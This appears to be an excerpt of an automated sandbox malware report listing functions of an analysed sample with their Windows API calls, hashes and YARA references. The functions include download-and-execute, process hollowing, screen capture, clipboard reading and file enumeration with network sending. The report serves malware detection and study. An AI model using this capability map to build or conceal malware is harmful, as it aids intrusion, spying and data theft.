                                • String ID:
                                • API String ID: 4212172061-0
                                • Opcode ID: 2958d0d59106b2716bbf9024854ff4f325b6253e079e5f73fc6a0a954244a96d
                                • Instruction ID: 651119c321e801f17dd1a7ba429a2dceeb4aa1bed9d5f8a21b6634afb1069130
                                • Opcode Fuzzy Hash: 2958d0d59106b2716bbf9024854ff4f325b6253e079e5f73fc6a0a954244a96d
                                • Instruction Fuzzy Hash: 8E61E935600606AAFB24AB36DC46BB773A8FF44714F14047FF905D7282EB78E9488769
                                Function 004063C6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 222filenetworkCOMMON
                                Download Yara Rule
                                APIs
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004064D2
                                • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004065B6
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: DownloadExecuteFileShell
                                • String ID: open
                                • API String ID: 2825088817-2758837156
                                • Opcode ID: 1ef1fcb5ee927166ed2bf606d15835eaf54d5e513457301e62ecff7219cb06ab
                                • Instruction ID: de45ecf938be0b84f02b1b366aeabb591a3e89dbb22835c7232af05a142efef6
                                • Opcode Fuzzy Hash: 1ef1fcb5ee927166ed2bf606d15835eaf54d5e513457301e62ecff7219cb06ab
                                • Instruction Fuzzy Hash: 6F61D331A0430167CA14FB75D8A697E77A99F81708F00093FFD42772D6EE3D8A09869B
                                Function 0044F2A3 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                  • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                  • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                  • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                  • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
                                  • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F2F7
                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F348
                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F408
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorInfoLastLocale$_free$_abort
                                • String ID:
                                • API String ID: 2829624132-0
                                • Opcode ID: 5d155598132bf3b03d9715496123f76655355fd2299683488a64446915391091
                                • Instruction ID: 12c224c4da0c85949021a4ccaa6d586ab513ef91610cb16151a2099a543b2454
                                • Opcode Fuzzy Hash: 5d155598132bf3b03d9715496123f76655355fd2299683488a64446915391091
                                • Instruction Fuzzy Hash: 49617D71600207ABEB289F25CC82B7B77A8EF14314F1041BBED06C6685EB78D949DB58
                                Function 004398AC Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • IsDebuggerPresent.KERNEL32 ref: 004399A4
                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004399AE
                                • UnhandledExceptionFilter.KERNEL32(?), ref: 004399BB
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                • String ID:
                                • API String ID: 3906539128-0
                                • Opcode ID: a2edd11b745fd0db19ae8b75a4dca2fd63e5a3b0d4ecfa6da1b026d4ab375051
                                • Instruction ID: 77e6618fa9d19f9c50586940e2a7469f5a9d54f298177c93e0bbf68cc30459b4
                                • Opcode Fuzzy Hash: a2edd11b745fd0db19ae8b75a4dca2fd63e5a3b0d4ecfa6da1b026d4ab375051
                                • Instruction Fuzzy Hash: 1D31D67591122C9BCB21DF65D9897CDB7B8BF08310F5051EAE40CA72A1E7749F858F48
                                Function 004315EC Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                Download Yara Rule
                                APIs
                                • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00431274,00000034,?,?,00000000), ref: 004315FE
                                • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00431307,00000000,?,00000000), ref: 00431614
                                • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00431307,00000000,?,00000000,0041C006), ref: 00431626
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Crypt$Context$AcquireRandomRelease
                                • String ID:
                                • API String ID: 1815803762-0
                                • Opcode ID: 490f37dff30391dd88b2b348f1e17f82ee14bc365aa64bdd7ac48a14519942bc
                                • Instruction ID: e2f248fbd61bea3c509e9dcbc4a9d000159a3c4e1760f154dd59208f6820a057
                                • Opcode Fuzzy Hash: 490f37dff30391dd88b2b348f1e17f82ee14bc365aa64bdd7ac48a14519942bc
                                • Instruction Fuzzy Hash: FDE0923130C310BBEB304F51AC09F172A55EB8DB72FA5063AF112E50F4D6518801855C
                                Function 0040A65A Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
                                Download Yara Rule
                                APIs
                                • OpenClipboard.USER32(00000000), ref: 0040A65D
                                • GetClipboardData.USER32(0000000D), ref: 0040A669
                                • CloseClipboard.USER32 ref: 0040A671
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Clipboard$CloseDataOpen
                                • String ID:
                                • API String ID: 2058664381-0
                                • Opcode ID: edb8c36ac275bb67b795d66d8e1b797ea5e31e94c4ba3ac6c333071066a6c16d
                                • Instruction ID: 184f8b84181a4a50bd43ef3289a1c1a9f5b779335cc527adffbe090e77bee848
                                • Opcode Fuzzy Hash: edb8c36ac275bb67b795d66d8e1b797ea5e31e94c4ba3ac6c333071066a6c16d
                                • Instruction Fuzzy Hash: 6CE08C3064432097D2206F60EC08B8A66649B50B12F064A7AB849AB2D1DA75DC208AAE
                                Function 004329DA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
                                Download Yara Rule
                                APIs
                                • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 004329F3
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: FeaturePresentProcessor
                                • String ID:
                                • API String ID: 2325560087-3916222277
                                • Opcode ID: 6bf946e24e0cf3f7143bf6f7c2898541fb51292b7eeb3b4358a3a41aa26ebfb9
                                • Instruction ID: 4a1c44cf8a386737ece403ae0cfd22a47b20ce31fd9c2d8f3958115f99bf9d9d
                                • Opcode Fuzzy Hash: 6bf946e24e0cf3f7143bf6f7c2898541fb51292b7eeb3b4358a3a41aa26ebfb9
                                • Instruction Fuzzy Hash: E4514A719002099BDB24CFAAD98579ABBF4FF48314F14846BD815EB350E3B9A910CFA5
                                Function 0044BA59 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: .
                                • API String ID: 0-248832578
                                • Opcode ID: 2bd3453bf6b0042b978c63341e7d52c868cd539d71c5d82670adc25c3f96db7e
                                • Instruction ID: 24926096c943187a016d953fe808ce2acf1242cb654f72e39a34338bfc4b4f1c
                                • Opcode Fuzzy Hash: 2bd3453bf6b0042b978c63341e7d52c868cd539d71c5d82670adc25c3f96db7e
                                • Instruction Fuzzy Hash: 0E3108719002486FEB248E79CC84EEB7BBDDB45304F14419EF858D7251EB34EE418B94
                                Function 00445E1C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004419DC,?,00000004), ref: 00445E6F
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: InfoLocale
                                • String ID: GetLocaleInfoEx
                                • API String ID: 2299586839-2904428671
                                • Opcode ID: 020099d0525865bb6834e28ad9152f433c6e4676045ed3ecc95ad7b7c68cac6a
                                • Instruction ID: a9bb3d2992a9d1fe8e60343c55b6d981a628f421e7cf107d295b861f9edee2c3
                                • Opcode Fuzzy Hash: 020099d0525865bb6834e28ad9152f433c6e4676045ed3ecc95ad7b7c68cac6a
                                • Instruction Fuzzy Hash: 6DF0F631600708BBDF016F619C05F6E7B51EB14721F10401BFC051A253CA758D109A9D
                                Function 004068CD Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 004068E8
                                • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 004069B0
                                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileFind$FirstNextsend
                                • String ID:
                                • API String ID: 4113138495-0
                                • Opcode ID: e3ef31e205124b2d37ce34f80ed01c56440b36d419931c260197812f3169fbb8
                                • Instruction ID: f886cb8170a1cbefaa312452e39d18d6cd017e90ab843946bfd6f4b2f28fefe7
                                • Opcode Fuzzy Hash: e3ef31e205124b2d37ce34f80ed01c56440b36d419931c260197812f3169fbb8
                                • Instruction Fuzzy Hash: 9C218F711043015BC314FBA1DC96CEFB7ACAF91358F400A3EF596621E1EF389A09CA5A
                                Function 0044F4F3 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                  • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                  • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                  • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                  • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
                                  • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F547
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$_free$InfoLocale_abort
                                • String ID:
                                • API String ID: 1663032902-0
                                • Opcode ID: ad0e0b7788e936bcfdd9e0a2c8ea1aecabb77b710f5984c66624a7eb150c0fcd
                                • Instruction ID: 815750de5804ab4a8f75770bcc990d44dba9c2967eca50803adc2dd3443e40da
                                • Opcode Fuzzy Hash: ad0e0b7788e936bcfdd9e0a2c8ea1aecabb77b710f5984c66624a7eb150c0fcd
                                • Instruction Fuzzy Hash: 6421B372901206BBEF249F26DC45A7A73A8EB04315F10017BFD01C6242EB78AD59CB59
                                Function 0044F17B Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                  • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                  • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                  • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                • EnumSystemLocalesW.KERNEL32(0044F2A3,00000001,00000000,?,00441F7E,?,0044F8D0,00000000,?,?,?), ref: 0044F1ED
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                • String ID:
                                • API String ID: 1084509184-0
                                • Opcode ID: 1e67477eb4f1d9c825940ef83573ecb2aed64948dc5e5734fb002b4aa87f20f9
                                • Instruction ID: fc4c71b657a69648ba6c32e8c27400de65702582941300ca2eca7bc8fd592fd6
                                • Opcode Fuzzy Hash: 1e67477eb4f1d9c825940ef83573ecb2aed64948dc5e5734fb002b4aa87f20f9
                                • Instruction Fuzzy Hash: D811293B6007019FEB189F39D89167BBB91FF80358B14443DE94647B40D776A946C744
                                Function 0044F723 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                  • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                  • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                  • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0044F4C1,00000000,00000000,?), ref: 0044F74F
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$InfoLocale_abort_free
                                • String ID:
                                • API String ID: 2692324296-0
                                • Opcode ID: c5ca8868f81a5dafb3fdb259ff2b8ec3965b2bfb8aabdce9695f87c3ae70661f
                                • Instruction ID: e4b95bc4a5e1061338a04706472302caa06a68982d3ebb8569a44a178f9f49d5
                                • Opcode Fuzzy Hash: c5ca8868f81a5dafb3fdb259ff2b8ec3965b2bfb8aabdce9695f87c3ae70661f
                                • Instruction Fuzzy Hash: 09F02D36600516BBFB245B65DC05BBB7768EF40764F05447AEC19A3240EA7CFD05C6D4
                                Function 0044F216 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                  • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                  • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                  • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                • EnumSystemLocalesW.KERNEL32(0044F4F3,00000001,?,?,00441F7E,?,0044F894,00441F7E,?,?,?,?,?,00441F7E,?,?), ref: 0044F262
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                • String ID:
                                • API String ID: 1084509184-0
                                • Opcode ID: d9e72da5ca64d0dbd4f9725887adba7bc59a573407832ad1990d17eaaac4c4d9
                                • Instruction ID: 7c38563944de2097393583401858843e6c2e12a799e64e453201a09b71e8bce8
                                • Opcode Fuzzy Hash: d9e72da5ca64d0dbd4f9725887adba7bc59a573407832ad1990d17eaaac4c4d9
                                • Instruction Fuzzy Hash: 44F0223A2007045FEB145F399881A7B7B94FF8036CB15447EF9458B690DAB6AC068614
                                Function 004195F8 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                Download Yara Rule
                                APIs
                                • GetUserNameW.ADVAPI32(?,00000010), ref: 0041962D
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: NameUser
                                • String ID:
                                • API String ID: 2645101109-0
                                • Opcode ID: 8951ed9e5e96f4eef37346a31dc1e1cfc055faec67558bb1b1f4eabc83ab8062
                                • Instruction ID: 5ca8c18713c22ae7facf93a828c8627c995cdb1c7496207664ac88b3b4335c79
                                • Opcode Fuzzy Hash: 8951ed9e5e96f4eef37346a31dc1e1cfc055faec67558bb1b1f4eabc83ab8062
                                • Instruction Fuzzy Hash: 7C01FF7290011CABCB04EBD5DC45EDEB7BCEF44319F10016AB505B61A5EEB46A89CB98
                                Function 00445914 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00442D9A: EnterCriticalSection.KERNEL32(?,?,004404DB,00000000,0046B4D8,0000000C,00440496,?,?,?,00443038,?,?,004457DA,00000001,00000364), ref: 00442DA9
                                • EnumSystemLocalesW.KERNEL32(004458CE,00000001,0046B680,0000000C), ref: 0044594C
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                • String ID:
                                • API String ID: 1272433827-0
                                • Opcode ID: 9f071f7aa8f2d5cfdb4dd86670e259d2fa7dae68b4529c3cbc217272811744e5
                                • Instruction ID: 57fcd2d1ba6fdacad71b84952267562ddc6b8062f8818d57533dd41bf3368d71
                                • Opcode Fuzzy Hash: 9f071f7aa8f2d5cfdb4dd86670e259d2fa7dae68b4529c3cbc217272811744e5
                                • Instruction Fuzzy Hash: CFF03C72A10700EFEB00EF69D846B5D77F0EB08325F10402AF400DB2A2DAB989448B5E
                                Function 0044F130 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                  • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                  • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                  • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                • EnumSystemLocalesW.KERNEL32(0044F087,00000001,?,?,?,0044F8F2,00441F7E,?,?,?,?,?,00441F7E,?,?,?), ref: 0044F167
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                • String ID:
                                • API String ID: 1084509184-0
                                • Opcode ID: 27fc750af04bae75093f47f6c8e3f33632e5f31a47d704513601fd173c54c35f
                                • Instruction ID: 407cbbfb1d6a14fdc0c4ba4a8479f65f1c0a46e2fba7f2f7bc53bc9e3406d240
                                • Opcode Fuzzy Hash: 27fc750af04bae75093f47f6c8e3f33632e5f31a47d704513601fd173c54c35f
                                • Instruction Fuzzy Hash: 22F05C3930020597DB049F35D845A7ABFA0EFC1754F060069EA058B651C6359C46C754
                                Function 0040E2BB Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                Download Yara Rule
                                APIs
                                • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00413F34,00471E78,00472910,00471E78,00000000,00471E78,00000000,00471E78,3.8.0 Pro), ref: 0040E2CF
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: InfoLocale
                                • String ID:
                                • API String ID: 2299586839-0
                                • Opcode ID: 856777f14b9a4662401ba442cf494b6ebb80c668ca2d98772b8c18b49fbcc60a
                                • Instruction ID: e43a985d938ffd5d313bbeec62feab64fa47c80c67ee5e1720aa7bcbe65aeca7
                                • Opcode Fuzzy Hash: 856777f14b9a4662401ba442cf494b6ebb80c668ca2d98772b8c18b49fbcc60a
                                • Instruction Fuzzy Hash: 65D05E30B4421C7BEA10D6859C0AEAA7B9CD701B62F0001A6BA08D72D0E9E1AE0487E6
                                Function 004328FC Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                Download Yara Rule
                                APIs
                                • SetUnhandledExceptionFilter.KERNEL32(Function_00032908,0043262F), ref: 00432901
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExceptionFilterUnhandled
                                • String ID:
                                • API String ID: 3192549508-0
                                • Opcode ID: 937b0859e2ecbaa4ed0ef4ac8f36e04938c9481000da7c0a06be09f57d080333
                                • Instruction ID: aee9a4537fe14d989eba5338f3e0e07ed20d0bd3150f914eab3e23255f36ef43
                                • Opcode Fuzzy Hash: 937b0859e2ecbaa4ed0ef4ac8f36e04938c9481000da7c0a06be09f57d080333
                                • Instruction Fuzzy Hash:
                                Function 0041642D Relevance: 49.3, APIs: 22, Strings: 6, Instructions: 289libraryloaderthreadCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00416474
                                • GetProcAddress.KERNEL32(00000000), ref: 00416477
                                • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00416488
                                • GetProcAddress.KERNEL32(00000000), ref: 0041648B
                                • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041649C
                                • GetProcAddress.KERNEL32(00000000), ref: 0041649F
                                • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004164B0
                                • GetProcAddress.KERNEL32(00000000), ref: 004164B3
                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00416555
                                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041656D
                                • GetThreadContext.KERNEL32(?,00000000), ref: 00416583
                                • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004165A9
                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041662B
                                • TerminateProcess.KERNEL32(?,00000000), ref: 0041663F
                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041667F
                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00416749
                                • SetThreadContext.KERNEL32(?,00000000), ref: 00416766
                                • ResumeThread.KERNEL32(?), ref: 00416773
                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041678A
                                • GetCurrentProcess.KERNEL32(?), ref: 00416795
                                • TerminateProcess.KERNEL32(?,00000000), ref: 004167B0
                                • GetLastError.KERNEL32 ref: 004167B8
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`Mw$ntdll
                                • API String ID: 4188446516-1701449367
                                • Opcode ID: 5b7e1e0f0ab70bb274c8e1cba5061de31cdd1b1bc4dd29beedf5b9f83fbb8038
                                • Instruction ID: 94204e0ceb90eb3d518cc699b6b418d02f123724867831e7a48fec904b930286
                                • Opcode Fuzzy Hash: 5b7e1e0f0ab70bb274c8e1cba5061de31cdd1b1bc4dd29beedf5b9f83fbb8038
                                • Instruction Fuzzy Hash: 9CA18E71604300AFDB109F64DC85F6B7BE8FB48749F00092AF695D62A1E7B8EC44CB5A
                                Function 00416E7E Relevance: 47.6, APIs: 26, Strings: 1, Instructions: 307windowmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00416E98
                                • CreateCompatibleDC.GDI32(00000000), ref: 00416EA5
                                  • Part of subcall function 004172DF: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 0041730F
                                • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00416F1B
                                • DeleteDC.GDI32(00000000), ref: 00416F32
                                • DeleteDC.GDI32(00000000), ref: 00416F35
                                • DeleteObject.GDI32(00000000), ref: 00416F38
                                • SelectObject.GDI32(00000000,00000000), ref: 00416F59
                                • DeleteDC.GDI32(00000000), ref: 00416F6A
                                • DeleteDC.GDI32(00000000), ref: 00416F6D
                                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00416F91
                                • GetIconInfo.USER32(?,?), ref: 00416FC5
                                • DeleteObject.GDI32(?), ref: 00416FF4
                                • DeleteObject.GDI32(?), ref: 00417001
                                • DrawIcon.USER32(00000000,?,?,?), ref: 0041700E
                                • GetObjectA.GDI32(00000000,00000018,?), ref: 00417026
                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 00417095
                                • GlobalAlloc.KERNEL32(00000000,?), ref: 00417104
                                • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00417128
                                • DeleteDC.GDI32(?), ref: 0041713C
                                • DeleteDC.GDI32(00000000), ref: 0041713F
                                • DeleteObject.GDI32(00000000), ref: 00417142
                                • GlobalFree.KERNEL32(?), ref: 0041714D
                                • DeleteObject.GDI32(00000000), ref: 00417201
                                • GlobalFree.KERNEL32(?), ref: 00417208
                                • DeleteDC.GDI32(?), ref: 00417218
                                • DeleteDC.GDI32(00000000), ref: 00417223
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                • String ID: DISPLAY
                                • API String ID: 479521175-865373369
                                • Opcode ID: 1a3d4f3de887f4170ad339b02c00c27acc1d1d199adb59c50c414d62b5943ebe
                                • Instruction ID: 4ba325f74191387ade15767708145f982ef5b1c7ca4df498548f130554e7309d
                                • Opcode Fuzzy Hash: 1a3d4f3de887f4170ad339b02c00c27acc1d1d199adb59c50c414d62b5943ebe
